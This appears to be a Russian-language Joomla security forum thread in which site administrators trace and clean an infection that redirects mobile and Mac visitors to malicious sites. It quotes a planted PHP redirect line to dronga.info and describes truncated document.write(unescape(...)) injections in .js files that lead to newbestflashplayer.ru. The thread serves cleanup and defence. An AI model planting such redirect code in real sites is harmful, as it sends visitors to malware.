Если подцепили зразу которая грузит flv_player при загрузке сайта с мобильногоустройства - Безопасность сайтов на Joomla

файл includes/application.php

строка внизу
if (detect_mobile_device()) { header("Location: http://dronga.info/mobile/index.php?src=other");exit(); }

Такой же вирус. В указанном месте этой строки нет. Во всех сайтах смотрел.  ((

Ищи в JavaScript

Подскажите, плз, скан fls.php подозрительно относится к этому файлу: /components/com_mailto/controller.php

Найдена функция $_POST[

Нашел в файле строчку: $link = base64_decode( JRequest::getVar( 'link', '', 'post', 'base64' ) );. Это Шелл?

Я сравнил с файлом из вроде как чистого бэкапа - там такая же строчка есть.

А почитать документацию разработчиков PHP ?
http://php.net/base64_decode
Функции для кодинга base64, не всегда шелл
Не шелл.

Такой же вирус. В указанном месте этой строки нет. Во всех сайтах смотрел.  ((

Ищи:

Все файлы .js содержали вставки

;document.write(unescape("%....

сайты при заходе с мобильных устройств и из МАС ОС переводили на  newbestflashplayer.ru

Здесь вот описание:  http://www.odmin4eg.ru/2013/вирус-в-js-файлах/
Похоже, зараза свежая.

в чистке помог скрипт: http://secu.ru/scripts/find-and-replace

Вопрос как оно попало на сайты остается открытым:(

Ищи:

Все файлы .js содержали вставки

;document.write(unescape("%....

сайты при заходе с мобильных устройств и из МАС ОС переводили на  newbestflashplayer.ru

Здесь вот описание:  http://www.odmin4eg.ru/2013/вирус-в-js-файлах/
Похоже, зараза свежая.

в чистке помог скрипт: http://secu.ru/scripts/find-and-replace

Вопрос как оно попало на сайты остается открытым:(

Уже чищу. Может к этому как-то причастен редактор TinyMCE?

Почему я так говорю - все строчки ;document.write(unescape("%.... прописываются в конце js-документов и легко удаляются. Только в файлах, относящихся к js-файлам TinyMCE я находил строчки, которые была прописаны между кодом документа, и в добавок содержали дополнительные символы в начале:

В общем, этот вирус еще и ссылки левые понастовлял. Причем не везде, а только в материалах созданных через раздел "Статьи".

Ссылки просматриваются через редактор TinyMCE но удалить их не представляется возможности - кнопки "сохранить" и "применить" кликабельны, но изменений не фиксируют. Сам редактор какой-то полуживой - иконок сверху нету. Работает только HTML-режим.

Текст ссылок и сами юрлы на ftp при поиске текста скриптом не обнаруживаются. 

Уже чищу. Может к этому как-то причастен редактор TinyMCE?

Почему я так говорю - все строчки ;document.write(unescape("%.... прописываются в конце js-документов и легко удаляются. Только в файлах, относящихся к js-файлам TinyMCE я находил строчки, которые была прописаны между кодом документа, и в добавок содержали дополнительные символы в начале:

Спойлер

[свернуть]

как правило то редактор JCE